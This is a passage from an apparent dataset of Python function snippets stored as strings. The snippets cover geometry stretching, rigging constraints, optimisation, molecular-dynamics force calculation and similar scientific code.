QgsGeometry.fromPolyline(line)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n if wkbType == QGis.WKBPolygon:\n stretchedGeom = QgsGeometry(geom)\n lines = stretchedGeom.asPolygon() # lista di linee\n atSubGeom = 0\n for line in lines: \n subGeom = QgsGeometry.fromPolyline(line)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n if wkbType == QGis.WKBMultiPolygon:\n stretchedGeom = QgsGeometry(geom)\n polygons = geom.asMultiPolygon() # vettore di poligoni\n atSubGeom = 0\n for polygon in polygons:\n subGeom = QgsGeometry.fromPolygon(polygon)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n return None", "def gripStretchCircle(circle, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n newCenter = QgsPoint(circle.center)\n newRadius = circle.radius\n \n for ptToStretch in ptListToStretch:\n if qad_utils.ptNear(ptToStretch, circle.center): # se i punti sono sufficientemente vicini\n newCenter.set(circle.center.x() + offSetX, circle.center.y() + offSetY)\n elif circle.isPtOnCircle(ptToStretch):\n newPt = QgsPoint(basePt.x() + offSetX, basePt.y() + offSetY)\n newRadius = qad_utils.getDistance(circle.center, newPt)\n\n newCircle = qad_circle.QadCircle()\n if newCircle.set(newCenter, newRadius) == False:\n return None\n \n return newCircle", "def generate_constraints_between_chains(self):\n node_to_chain_mapping = defaultdict(set)\n # collect all places where each node is used and at what subchain index\n for chain_idx in range(len(self.chains)):\n chain = self.chains[chain_idx]\n for subchain_idx in range(len(chain)):\n parent, child = chain[subchain_idx]\n node_to_chain_mapping[parent].add(\n AbstractConstraint(chain_idx, subchain_idx)\n )\n # don't forget about the final child in the chain (parents are already accounted for)\n final_parent, final_child = chain[-1]\n node_to_chain_mapping[final_child].add(\n AbstractConstraint(chain_idx, len(chain))\n )\n # our final mapping correlates constraints on a per-chain basis\n # e.g. for chain index 0 at subchain index 1, we have a constraint (shared node) in chain 2\n chain_constraints = list()\n for chain_idx in range(len(self.chains)):\n chain = self.chains[chain_idx]\n chain_constraint = [set() for i in range(len(chain) + 1)]\n for subchain_idx in range(len(chain)):\n parent, child = chain[subchain_idx]\n node_constraints = node_to_chain_mapping[parent]\n for constraint in node_constraints:\n if constraint.chain_index != chain_idx:\n chain_constraint[subchain_idx].add(constraint)\n # don't forget about the final child in the chain (parents are already accounted for)\n final_parent, final_child = chain[-1]\n node_constraints = node_to_chain_mapping[final_child]\n for constraint in node_constraints:\n if constraint.chain_index != chain_idx:\n chain_constraint[len(chain)].add(constraint)\n chain_constraints.append(chain_constraint)\n return chain_constraints", "def stretch(points, stretches=[1, 1]):\n x = stretches[0] * points[0]\n y = stretches[1] * points[1]\n return [x, y]", "def _adjust_constraints(self, point):\n logger.info(f'Adjusting constraints on point {len(self)}')\n\n # Flat list of all the atom indexes involved in the bonds\n atom_idxs = [i for bond in self.bonds for i in bond]\n\n max_step, min_step = ade.Config.max_step_size, ade.Config.min_step_size\n\n for bond in self.bonds:\n (i, j), coords = bond.atom_indexes, self[-1].species.coordinates\n\n # Normalised r_ij vector\n vec = coords[j] - coords[i]\n vec /= np.linalg.norm(vec)\n\n # Calculate |∇E_i·r| i.e. the gradient along the bond. Positive\n # values are downhill in energy to form the bond and negative\n # downhill to break it\n gradi = np.dot(self[-1].grad[i], vec) # |∇E_i·r| bond midpoint\n gradj = np.dot(self[-1].grad[j], -vec)\n\n # Exclude gradients from atoms that are being substituted\n if atom_idxs.count(i) > 1:\n grad = gradj\n elif atom_idxs.count(j) > 1:\n grad = gradi\n else:\n grad = np.average((gradi, gradj))\n\n logger.info(f'|∇E_i·r| = {grad:.4f} on {bond}')\n\n # Downhill in energy to break/form this breaking/forming bond\n if grad * np.sign(bond.dr) > 0:\n dr = np.sign(bond.dr) * ade.Config.max_step_size\n\n # otherwise use a scaled value, depending on the gradient\n # large values will have small step sizes, down to min_step Å\n else:\n dr = (max_step - min_step) * np.exp(-(grad/0.05)**2) + min_step\n dr *= np.sign(bond.dr)\n\n new_dist = point.species.distance(*bond.atom_indexes) + dr\n\n # No need to go exceed final distances on forming/breaking bonds\n if bond.forming and new_dist < bond.final_dist:\n new_dist = bond.final_dist\n\n elif bond.breaking and new_dist > bond.final_dist:\n new_dist = bond.final_dist\n\n else:\n logger.info(f'Using step {dr:.3f} Å on bond: {bond}')\n\n point.constraints[bond.atom_indexes] = new_dist\n\n return None", "def gripStretchQgsLinearObjectList(linearObjectList, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n linearObjectListToStretch = qad_utils.QadLinearObjectList(linearObjectList)\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n\n return linearObjectListToStretch", "def make_shaped_repertoire(RNs):\n # get objective distribution\n bin_edges, obj_dist, volume = objective_distribution()\n # get an antigenic epitope sequence, and in case of nkey=1,2 check whether\n # it can populate all required bins, thus avoiding infinite loop below\n AgEpitope = get_AgEpitope(RNs)\n if cf.nkey == 1 or cf.nkey == 2:\n while 1:\n # get list of all possible binding partners and their energies\n all_partners = get_all_partners()\n all_energies = [E_best(partner, AgEpitope)\n for partner in all_partners]\n # check whether all bins are occupiable with these energies,\n # if not, get new epitope sequence\n indices = np.digitize(all_energies, bin_edges, right=True)\n ind_set = set(indices)\n ind_set.discard(0)\n # if all bins can be occupied, move on\n if ind_set == set(range(1, len(bin_edges))):\n break\n # else get a new epitope and check its validity\n else:\n AgEpitope = get_AgEpitope(RNs)\n # initialise empty list for counting how many seqs have been found per bin\n ist_dist = np.zeros(len(obj_dist))\n # seq_list for collecting identified sequences\n seq_list = []\n E_list = []\n # while ist_dist and obj_dist are not equal, get new sequences and position\n # them if they are useful\n # introduce a tolerance of how far bins are allowed to deviate from the\n # goal, as otherwise runtime explodes due to very long waiting times for\n # high binding energy codes in large nkey cases - allow an absolute\n # deviation of volume*tolerance % for each bin.\n abs_tol = volume * 0.005\n while np.sum(np.abs((ist_dist-obj_dist)) > abs_tol) > 0:\n ab = Ab_seq(RNs)\n Emax = E_best(ab, AgEpitope)\n # find index bin of this energy\n indx = np.digitize(Emax, bin_edges, right=True)\n # if the index is in the useful range and the bin is not yet full,\n # count the sequence and store it\n if indx in range(1, len(bin_edges)):\n if obj_dist[indx-1] - ist_dist[indx-1] > 0:\n ist_dist[indx-1] += 1\n seq_list.append(ab)\n E_list.append(Emax)\n\n return seq_list, E_list, AgEpitope", "def full_strain(x, dof):\n base = np.zeros([6, dof])\n\n if dof % 2 == 1:\n bending_start = 1\n base[0, 0] = 1 # constant torsion\n else:\n bending_start = 2\n base[0, 0] = 1 # constant torsion\n base[0, 1] = x # linear torsion\n\n base[1, bending_start] = 1 # y-bending\n base[1, bending_start + 1] = x # linear y-bending\n\n if dof <= 6:\n base[2, bending_start + 2] = 1 # z-bending\n base[2, bending_start + 3] = x # linear z-bending\n else:\n base[1, bending_start + 2] = x ** 2 # quadratic y-bending\n base[2, bending_start + 3] = 1 # z-bending\n base[2, bending_start + 4] = x # linear z-bending\n base[2, bending_start + 5] = x ** 2 # quadratic z-bending\n return base", "def generate_constraints():\n return list(chain(collect_rows(), collect_columns(), collect_blocks()))", "def make_stair(nstep,treadDept,riserHeight,landingLength,stepWidth,n):\n\tstep = MKPOL([[[0,0],[0,riserHeight],[2*treadDept,riserHeight], [treadDept,0]],[[1,2,3,4]],1])\n\tstep1 = MKPOL([[[0,0],[0,riserHeight],[treadDept,2*riserHeight], [treadDept,riserHeight]],[[1,2,3,4]],1])\n\tstep = PROD([QUOTE([stepWidth]),step])\n\tstep = TEXTURE(\"texture/Liptus.jpg\")(step)\n\thandrailTop = PROD([QUOTE([stepWidth/15.0]),step1])\n\thandrail = CIRCLE(stepWidth/30.0)([20,20])\n\n\thandrail = PROD([QUOTE([1]),handrail])\n\n\thandrail = R([1,3])(PI/2)(handrail)\n\thandrail = T([1,2,3])([stepWidth-(stepWidth/30.0),treadDept/2,riserHeight])(handrail)\n\thandrail = COLOR(BLACK)(handrail)\n\tstep = STRUCT([step,handrail])\n\thandrailTop = R([2,3])(PI)(handrailTop)\n\thandrailTop = T([1,2,3])([stepWidth-(stepWidth/15.0),treadDept,1+2*riserHeight])(handrailTop)\n\thandrailTop = TEXTURE(\"texture/Liptus.jpg\")(handrailTop)\n\tstep = STRUCT([step,handrailTop])\n\tstair = [step]\n\tif n == 0:\n\t\tstair = []\n\t\"\"\" realization total step \"\"\"\n\tfor i in range(nstep):\n\t\tstep = T([2,3])([treadDept,riserHeight])(step)\n\t\tstair.append(step)\n\tfinalStep = T([2,3])([(treadDept*(nstep+1)),(riserHeight*(nstep))])(CUBOID([stepWidth,landingLength,riserHeight]))\n\tfinalStep = TEXTURE(\"texture/Liptus.jpg\")(finalStep)\n\tstair.append(finalStep)\n\treturn STRUCT(stair)", "def createSpSwConstraint(parents, target, enumNames, niceNames=['Space'],constrType='parent',constrTarget=''):\n if constrTarget == '':\n if target.endswith('_CTRL'):\n stripName=target.rpartition('_')\n constrTarget=stripName[0]+'Ctrl_ROOT'\n else:\n constrTarget=target\n\n if niceNames <= 1:\n niceName=niceNames\n else:\n niceName=''\n for i,x in enumerate(niceNames):\n if i < len(niceNames)-1:\n niceName=niceName+x+' / '\n else:\n niceName=niceName+x\n\n existingAttr=cmds.listAttr(target)\n constr=eval('cmds.'+constrType+'Constraint(parents,constrTarget,mo=True)')\n if 'spSwSep' not in existingAttr:\n cmds.addAttr(target, ln='spSwSep', nn='___ Space Switching', at='enum', en='___', k=True)\n cmds.addAttr(target, ln='spaceSwitch', nn=niceName+' Switch', at='enum', en=enumNames, k=True)\n for i,x in enumerate(parents):\n if not i == 1:\n rev=cmds.createNode('reverse', n=target+'spaceSwitch_REV')\n cmds.connectAttr(target+'.spaceSwitch',rev+'.inputX')\n cmds.connectAttr(rev+'.outputX', constr[0]+'.'+x+'W'+str(i))\n else:\n cmds.connectAttr(target+'.spaceSwitch', constr[0]+'.'+x+'W'+str(i))", "def pk_constrained(self, snr=30, headroom = 0):\n # Initialize\n self.pk = np.zeros((self.n_waves, len(self.controls.k0)), dtype=np.csingle)\n # loop over frequencies\n bar = tqdm(total = len(self.controls.k0), desc = 'Calculating Constrained Optim.')\n for jf, k0 in enumerate(self.controls.k0):\n # get the scaled version of the propagating directions\n k_vec = k0 * self.dir\n # Form the sensing matrix\n h_mtx = np.exp(1j*self.receivers.coord @ k_vec.T)\n H = h_mtx.astype(complex) # cvxpy does not accept floats, apparently\n # measured data\n pm = self.pres_s[:,jf].astype(complex)\n # Performing constrained optmization cvxpy\n x_cvx = cp.Variable(h_mtx.shape[1], complex = True) # create x variable\n # Create the problem\n epsilon = 10**(-(snr-headroom)/10)\n problem = cp.Problem(cp.Minimize(cp.norm2(x_cvx)**2),\n [cp.pnorm(pm - cp.matmul(H, x_cvx), p=2) <= epsilon])\n problem.solve(solver=cp.SCS, verbose=False)\n self.pk[:,jf] = x_cvx.value\n bar.update(1)\n bar.close()", "def constraints(self) -> Tuple[NDArray, NDArray]:", "def generate_powerset_bridge_constraints(problem):\n\n c_30 = _dynamic_constraint_30(problem)\n c_33 = _dynamic_constraint_33(problem)\n c_34 = _dynamic_constraint_34(problem)\n c_35 = _dynamic_constraint_35(problem)\n c_36 = _dynamic_constraint_36(problem)\n\n return c_30 & c_33 & c_34 & c_35 & c_36", "def constraints(self):\n ...", "def gripStretchArc(arc, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, inverseArc = None):\n startPt = arc.getStartPt()\n endPt = arc.getEndPt()\n middlePt = arc.getMiddlePt()\n newStartPt = QgsPoint(startPt)\n newEndPt = QgsPoint(endPt)\n newMiddlePt = QgsPoint(middlePt)\n newCenter = None\n startPtChanged = endPtChanged = middlePtPtChanged = False\n for ptToStretch in ptListToStretch:\n if qad_utils.ptNear(ptToStretch, arc.center): # se i punti sono sufficientemente vicini\n newCenter = QgsPoint(arc.center.x() + offSetX, arc.center.y() + offSetY)\n else:\n if qad_utils.ptNear(startPt, ptToStretch):\n newStartPt.set(startPt.x() + offSetX, startPt.y() + offSetY)\n startPtChanged = True\n elif qad_utils.ptNear(endPt, ptToStretch):\n newEndPt.set(endPt.x() + offSetX, endPt.y() + offSetY)\n endPtChanged = True\n elif qad_utils.ptNear(middlePt, ptToStretch):\n newMiddlePt.set(middlePt.x() + offSetX, middlePt.y() + offSetY)\n middlePtPtChanged = True\n \n newArc = qad_arc.QadArc()\n if newArc.fromStartSecondEndPts(newStartPt, newMiddlePt, newEndPt) == False:\n return None\n \n # se il centro era nei punti di grip\n if newCenter is not None:\n # se i tre punti dell'arco erano nei punti di grip oppure\n # allora non cambio il centro\n if (startPtChanged and endPtChanged and middlePtPtChanged):\n pass\n else:\n newArc.center.set(newCenter.x(), newCenter.y())\n \n if inverseArc is not None: # se l'arco faceva parte di una linestring\n # verifico il verso del nuovo arco\n if qad_utils.ptNear(newStartPt, newArc.getStartPt()):\n # stesso verso del vecchio arco\n return newArc, inverseArc\n else:\n return newArc, not inverseArc\n \n return newArc", "def create_cont_constraint_mat_separable(H,v1s,v2s,nSides,nConstraints,nC,\n dim_domain,dim_range,tess):\n if dim_domain != 2:\n raise ValueError\n if dim_range not in [1,2]:\n raise ValueError\n nHomoCoo=dim_domain+1 \n length_Avee = dim_range*nHomoCoo\n L1 = np.zeros((nConstraints/2,nC*nHomoCoo))\n\n \n\n nPtsInSide = 2 # Since, in 2D, the side is always a line joining 2 pts.\n# if nSides != nConstraints/(nPtsInSide*dim_domain):\n# raise ValueError(nSides,nConstraints)\n \n if nSides != nConstraints/(nPtsInSide*dim_range):\n print \" print nSides , nConstraints/(nPtsInSide*dim_range):\"\n print nSides , nConstraints/(nPtsInSide*dim_range)\n ipshell('stop')\n raise ValueError( nSides , (nConstraints,nPtsInSide,dim_range))\n\n \n if nSides != H.shape[0]:\n raise ValueError(nSides,H.shape)\n\n\n# M = nPtsInSide*dim_range\n M = nPtsInSide\n if dim_range == 1:\n raise NotImplementedError\n for i in range(nSides): \n v1 = v1s[i]\n v2 = v2s[i]\n \n h = H[i]\n a,b = h.nonzero()[0] # idx for the relevant As \n # s stands for start\n # e stands for end \n s1 = a*length_Avee \n e1 = s1+nHomoCoo \n s2 = b*length_Avee\n e2 = s2+nHomoCoo \n \n # Constraint 1: \n L[i*M,s1:e1]= v1 \n L[i*M,s2:e2]= -v1 \n # Constraint 2: \n L[i*M+1,s1:e1]= v2 \n L[i*M+1,s2:e2]= -v2 \n \n \n elif dim_range==2:\n for i in range(nSides): \n v1 = v1s[i]\n v2 = v2s[i]\n\n if np.allclose(v1,v2):\n raise ValueError(v1,v2)\n\n\n \n \n \n h = H[i]\n a,b = h.nonzero()[0] # idx for the relevant As \n \n\n # L1 is acting on columns of the following form:\n # [ a_1 b_1 c_1 d_1 a_2 b_2 c_2 d_2 ... a_Nc b_Nc c_Nc d_Nc] \n # s stands for start\n # e stands for end \n s1 = a*nHomoCoo\n e1 = s1+nHomoCoo \n s2 = b*nHomoCoo\n e2 = s2+nHomoCoo \n \n \n try: \n # Constraint 1: \n row = np.zeros(L1.shape[1])\n row[s1:e1]=v1\n row[s2:e2]=-v1 \n # x component \n L1[i*M]=row \n except:\n ipshell('fail')\n raise \n\n # Constraint 2: \n row = np.zeros(L1.shape[1])\n row[s1:e1]=v2\n row[s2:e2]=-v2 \n # x component \n L1[i*M+1]=row\n \n\n \n \n \n \n \n else:\n raise ValueError(dim_range)\n\n \n return L1", "def create_fk_chain(controls, joints):\n\n # create control offset transforms\n constraints = []\n exp_tf_ms = []\n\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par: cmds.parent(buf, par[0])\n\n exp_tf_ms.append(buf)\n\n for src, trg in zip(controls, joints):\n # constrain fk joints to controls, hide the constraint nodes\n pc = cmds.parentConstraint(src, trg, mo=True)[0]\n cmds.setAttr('{node}.interpType'.format(node=pc), 2)\n cmds.setAttr('{node}.visibility'.format(node=pc), False)\n sc = cmds.scaleConstraint(src, trg)[0]\n cmds.setAttr('{node}.visibility'.format(node=sc), False)\n constraints.extend([pc, sc])\n\n return constraints, exp_tf_ms", "def generate_all_constraints(traj,policy,mdp):\n #print('generating all constraints')\n constraints = []\n traj_tmp = list(traj)\n #print(traj_tmp)\n #compute halfspace normals for all (s,a) pairs until terminal\n while(len(traj_tmp)>1):\n constraints += generate_half_space_normals(traj_tmp,policy,mdp)\n #print(constraints)\n traj_tmp.pop(0)\n #print('after pop',traj_tmp)\n return constraints", "def test_tensor_composite_constraints_equal_penalties():\n from pygam.penalties import derivative\n\n def der1(*args, **kwargs):\n kwargs.update({'derivative':1})\n return derivative(*args, **kwargs)\n\n # create a 3D tensor where the penalty should be equal to the constraint\n term = te(0, 1, 2,\n n_splines=[4, 5, 6],\n penalties=der1,\n lam=1,\n constraints='monotonic_inc')\n\n # check all the dimensions\n for i in range(3):\n P = term._build_marginal_penalties(i).A\n C = term._build_marginal_constraints(i,\n -np.arange(term.n_coefs),\n constraint_lam=1,\n constraint_l2=0).A\n\n assert (P == C).all()", "def initializeConstraints(self):\n constraints = []\n\n for i in range(9):\n for j in range(9):\n for k in range(j+1, 9):\n # initialize row constraints\n constraints.append((i*9 + j, i*9 + k))\n # initialize col constraints\n constraints.append((j*9 + i, k*9 + i))\n\n # initialize square constraints\n pos1 = i * 9 + j\n for diff in [7, 8, 10, 11, 16, 17, 19, 20]:\n pos2 = i * 9 + j + diff\n if self.inSameSquare(pos1, pos2):\n constraints.append((pos1, pos2))\n\n return constraints", "def linear_strain(x, dof):\n base = np.zeros([6, dof])\n base[1, 0] = 1 # initial y-bending\n if dof > 2:\n base[1, 1] = x # linear y-bending term\n base[2, dof-1] = x # linear z-bending term\n return base", "def force ( box, strain, r ):\n\n import numpy as np\n from itertools import product\n import math\n \n # It is assumed that positions are in units where box = 1\n # Forces are calculated in units where sigma = 1 and epsilon = 1\n # Lees-Edwards boundaries, in sliding brick arrangement\n # Flow/gradient/vorticity directions are x/y/z == 0/1/2\n # Uses neighbour lists\n\n n = r.shape[0]\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 cells in cubic lattice\n # The cells are chosen so that if (d0,d1,d2) appears, then (-d0,-d1,-d2) does not.\n # The last three cells are extra ones, to cope with the sheared system\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 0, 1], [-1, 0, 1], [ 0, 0, 1], # 5 cells with d1=0\n [ 1, 1, -1], [ 1, 1, 0], [ 1, 1, 1], # 3 cells with d0= 1, d1=1\n [ 0, 1, -1], [ 0, 1, 0], [ 0, 1, 1], # 3 cells with d0= 0, d1=1\n [-1, 1, -1], [-1, 1, 0], [-1, 1, 1], # 3 cells with d0=-1, d1=1\n [-2, 1, -1], [-2, 1, 0], [-2, 1, 1] ] ) # 3 cells with d0=-2, d1=1\n\n r[:,0] = r[:,0] - np.rint(r[:,1])*strain # Extra correction in box=1 units\n r = r - np.rint(r) # Ensure all atoms in periodic box\n \n sr2_ovr = 1.77 # Overlap threshold (pot > 100)\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n # Initialize\n f = np.zeros_like(r)\n total = PotentialType ( pot=0.0, vir=0.0, pyx=0.0, lap=0.0, ovr=False )\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n assert sc >= 3, 'System is too small for cells' # Guard against box being too small\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n shift = math.floor(strain*sc) # Strain measured in cell lengths\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, define a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n fc.append(np.zeros_like(rc[-1])) # Zero corresponding forces, add to list\n\n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n if rci.size==0: # Handle empty cell\n continue\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d.copy() # Standard list copied, including extra 3 cells\n dd[5:,0] = d[5:,0] - shift # All those looking up need adjustment in the x direction\n else: # i-cell is not in top layer\n dd = d[:-3,:].copy() # Last three extra cells are not needed; shift is not needed\n \n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij[:,:,0] = rij[:,:,0] - np.rint(rij[:,:,1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i==j when i-cell==j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = np.where ( in_range, 1.0/rij_sq, 0.0 ) # (sigma/rij)**2, only if in range\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = np.where ( in_range, pot+0.25, 0.0 ) # WCA LJ pair potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = vir * sr2 # LJ scalar part of forces\n fij = rij * fij[:,:,np.newaxis] # LJ pair forces\n pyx = rij[:,:,1]*fij[:,:,0] # Off-diagonal element of pressure tensor\n\n if ci1==cj1: # Correct for double-counting ij and ji when i-cell==j-cell\n fij = fij / 2\n total = total + PotentialType ( pot=np.sum(pot)/2, vir=np.sum(vir)/2, \n pyx=np.sum(pyx)/2, lap=np.sum(lap)/2, ovr=np.any(ovr) )\n else:\n total = total + PotentialType ( pot=np.sum(pot), vir=np.sum(vir), \n pyx=np.sum(pyx), lap=np.sum(lap), ovr=np.any(ovr) )\n\n fc[ci1][:,:] = fc[ci1][:,:] + np.sum(fij,axis=1) # Aggregate force on atoms in i-cell\n fc[cj1][:,:] = fc[cj1][:,:] - np.sum(fij,axis=0) # Aggregate force on atoms in j-cell\n\n # Copy forces from list of cell arrays to main force array\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n ci1 = np.ravel_multi_index(ci,(sc,sc,sc),mode='wrap') # Single-index\n f[mask,:] = fc[ci1] # Copy atom forces from correct cell\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # Initially empty list of indices\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d # Standard list copied, including extra 3 cells\n dd[5:,0] = dd[5:,0] - shift # All those looking up need adjustment in the x direction\n else:\n dd = d[:-3,:] # Last three extra cells are not needed; shift is not needed\n\n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where j-cell==i-cell and i is last atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = r[ki,:]-r[kj,:] # Separation vector\n rij[0] = rij[0] - np.rint(rij[1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq: # Check within cutoff\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = 1.0 / rij_sq # (sigma/rij)**2\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = pot + 0.25 # WCA LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = rij * vir * sr2 # LJ forces\n pyx = rij[1]*fij[0] # Off-diagonal element of pressure tensor\n total = total + PotentialType ( pot=pot, vir=vir, pyx=pyx, lap=lap, ovr=ovr )\n f[ki,:] = f[ki,:] + fij\n f[kj,:] = f[kj,:] - fij\n\n # Multiply results by numerical factors\n f = f * 24.0 # 24*epsilon\n total.pot = total.pot * 4.0 # 4*epsilon\n total.vir = total.vir * 24.0 / 3.0 # 24*epsilon and divide virial by 3\n total.pyx = total.pyx * 24.0 # 24*epsilon\n total.lap = total.lap * 24.0 * 2.0 # 24*epsilon and factor 2 for ij and ji\n \n return total, f", "def createConstraint(*argv):", "def build_constraints_boundaries(self):\n\n # Trapezoidal and Hermite-Simpson methods can't compute\n # defects at the last node contrary to pseudospectral methods\n coll_method = self.options['tr_method'] in [\n 'trapezoidal', 'hermite-simpson']\n n_nodes = self.problem.prm['n_nodes'] - \\\n 1 if coll_method else self.problem.prm['n_nodes']\n\n # Defects lower and upper boundaries\n defects_low = np.zeros(\n self.problem.prm['n_states'] * n_nodes)\n defects_upp = np.zeros(\n self.problem.prm['n_states'] * n_nodes)\n\n # Path lower and upper boundaries\n path_low = np.hstack([self.problem.low_bnd.path]\n * (self.problem.prm['n_nodes']))\n path_upp = np.hstack([self.problem.upp_bnd.path]\n * (self.problem.prm['n_nodes']))\n\n # Events lower and upper boundaries\n event_low = self.problem.low_bnd.event\n event_upp = self.problem.upp_bnd.event\n\n # Assembly of the lower and upper boundaries vectors\n low = np.concatenate((defects_low, path_low, event_low))\n upp = np.concatenate((defects_upp, path_upp, event_upp))\n\n return low, upp", "def makeBinaryChains():\n\t\n\t# retrieve the binding partner specifications\n\t(maxsize,types) = getTypes()\n\t\n\t# Do some basic argument checking for this model\n\tif (len(types) < 2):\n\t\tprint \"Number of defined types must equal two for binary chain calculations.\"\n\t\treturn\n\tif (maxsize == 0):\n\t\tprint \"Must specify a valid maximum number for one or more components.\"\n\t\treturn\n\n\tallChains = []\n\tnewChainsA = [[]]\n\tnewChainsB = []\n\t\n\ttypeA = types[0]\n\ttypeB = types[1]\n\t\n\t# start the chain with a single type A component\n\taddComponent(newChainsA[0],typeA,0,0)\n\n\tdepth = 0\n\tfor n in range(maxsize):\n\t\tdepth+=1\n\t\t\n\t\t# go through all the chains created last iteration and append B components\n\t\tnewChainsB = []\n\t\tfor thisChain in 